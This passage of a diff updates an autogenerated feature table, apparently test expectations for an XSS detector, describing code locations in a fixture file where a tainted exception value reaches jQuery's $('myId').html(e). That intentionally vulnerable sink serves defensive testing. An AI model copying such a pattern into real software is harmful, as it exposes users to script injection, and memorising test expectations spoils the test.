e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:46:3:46:19 | exceptional return of deep("bar" + foo) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:46:3:46:19 | exceptional return of deep("bar" + foo) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:46:8:46:12 | "bar" | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:46:8:46:12 | "bar" | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:46:8:46:12 | "bar" | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:46:8:46:12 | "bar" | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:46:8:46:12 | "bar" | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:46:8:46:12 | "bar" | stringConcatenatedWith | -endpoint- foo | +| autogenerated/Xss/ExceptionXss/exception-xss.js:46:8:46:18 | "bar" + foo | CalleeFlexibleAccessPath | deep | +| autogenerated/Xss/ExceptionXss/exception-xss.js:46:8:46:18 | "bar" + foo | InputArgumentIndex | 0 | +| autogenerated/Xss/ExceptionXss/exception-xss.js:46:8:46:18 | "bar" + foo | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:46:8:46:18 | "bar" + foo | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:46:8:46:18 | "bar" + foo | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:46:8:46:18 | "bar" + foo | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:46:8:46:18 | "bar" + foo | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:46:16:46:18 | foo | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:46:16:46:18 | foo | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:46:16:46:18 | foo | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:46:16:46:18 | foo | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:46:16:46:18 | foo | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:46:16:46:18 | foo | stringConcatenatedWith | 'bar' -endpoint- | +| autogenerated/Xss/ExceptionXss/exception-xss.js:47:11:47:11 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:47:11:47:11 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:47:11:47:11 | e | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:47:11:47:11 | e | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:47:11:47:11 | e | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:47:11:47:11 | e | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:47:11:47:11 | e | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:47:11:47:11 | e | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:47:11:47:11 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:47:11:47:11 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:48:3:48:3 | $ | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:48:3:48:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:48:3:48:3 | $ | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:48:3:48:3 | $ | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:48:3:48:3 | $ | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:48:3:48:11 | $('myId') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:48:3:48:11 | $('myId') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:48:3:48:11 | $('myId') | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:48:3:48:11 | $('myId') | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:48:3:48:11 | $('myId') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:48:3:48:11 | exceptional return of $('myId') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:48:3:48:11 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:48:3:48:11 | exceptional return of $('myId') | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:48:3:48:11 | exceptional return of $('myId') | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:48:3:48:11 | exceptional return of $('myId') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:48:3:48:16 | $('myId').html | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:48:3:48:16 | $('myId').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:48:3:48:16 | $('myId').html | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:48:3:48:16 | $('myId').html | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:48:3:48:16 | $('myId').html | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:48:3:48:19 | $('myId').html(e) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:48:3:48:19 | $('myId').html(e) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:48:3:48:19 | $('myId').html(e) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:48:3:48:19 | $('myId').html(e) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:48:3:48:19 | $('myId').html(e) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:48:3:48:19 | exceptional return of $('myId').html(e) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:48:3:48:19 | exceptional return of $('myId').html(e) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:48:3:48:19 | exceptional return of $('myId').html(e) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:48:3:48:19 | exceptional return of $('myId').html(e) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:48:3:48:19 | exceptional return of $('myId').html(e) | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:48:5:48:10 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/ExceptionXss/exception-xss.js:48:5:48:10 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:48:5:48:10 | 'myId' | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -18914,6 +128473,11 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:48:5:48:10 | 'myId' | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:48:5:48:10 | 'myId' | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:48:5:48:10 | 'myId' | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:48:13:48:16 | html | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:48:13:48:16 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:48:13:48:16 | html | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:48:13:48:16 | html | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:48:13:48:16 | html | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:48:18:48:18 | e | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/ExceptionXss/exception-xss.js:48:18:48:18 | e | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:48:18:48:18 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -18921,6 +128485,68 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:48:18:48:18 | e | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:48:18:48:18 | e | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:48:18:48:18 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:52:7:52:9 | tmp | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:52:7:52:9 | tmp | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:52:7:52:9 | tmp | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:52:7:52:9 | tmp | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:52:7:52:9 | tmp | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:52:7:52:23 | tmp = "bar" + foo | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:52:7:52:23 | tmp = "bar" + foo | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:52:7:52:23 | tmp = "bar" + foo | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:52:7:52:23 | tmp = "bar" + foo | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:52:7:52:23 | tmp = "bar" + foo | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:52:13:52:17 | "bar" | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:52:13:52:17 | "bar" | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:52:13:52:17 | "bar" | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:52:13:52:17 | "bar" | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:52:13:52:17 | "bar" | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:52:13:52:17 | "bar" | stringConcatenatedWith | -endpoint- foo | +| autogenerated/Xss/ExceptionXss/exception-xss.js:52:13:52:23 | "bar" + foo | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:52:13:52:23 | "bar" + foo | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:52:13:52:23 | "bar" + foo | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:52:13:52:23 | "bar" + foo | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:52:13:52:23 | "bar" + foo | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:52:21:52:23 | foo | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:52:21:52:23 | foo | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:52:21:52:23 | foo | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:52:21:52:23 | foo | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:52:21:52:23 | foo | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:52:21:52:23 | foo | stringConcatenatedWith | 'bar' -endpoint- | +| autogenerated/Xss/ExceptionXss/exception-xss.js:53:11:53:11 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:53:11:53:11 | e | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:53:11:53:11 | e | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:53:11:53:11 | e | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:53:11:53:11 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:54:3:54:3 | $ | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:54:3:54:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:54:3:54:3 | $ | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:54:3:54:3 | $ | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:54:3:54:3 | $ | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:54:3:54:11 | $('myId') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:54:3:54:11 | $('myId') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:54:3:54:11 | $('myId') | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:54:3:54:11 | $('myId') | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:54:3:54:11 | $('myId') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:54:3:54:11 | exceptional return of $('myId') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:54:3:54:11 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:54:3:54:11 | exceptional return of $('myId') | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:54:3:54:11 | exceptional return of $('myId') | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:54:3:54:11 | exceptional return of $('myId') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:54:3:54:16 | $('myId').html | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:54:3:54:16 | $('myId').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:54:3:54:16 | $('myId').html | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:54:3:54:16 | $('myId').html | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:54:3:54:16 | $('myId').html | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:54:3:54:19 | $('myId').html(e) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:54:3:54:19 | $('myId').html(e) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:54:3:54:19 | $('myId').html(e) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| 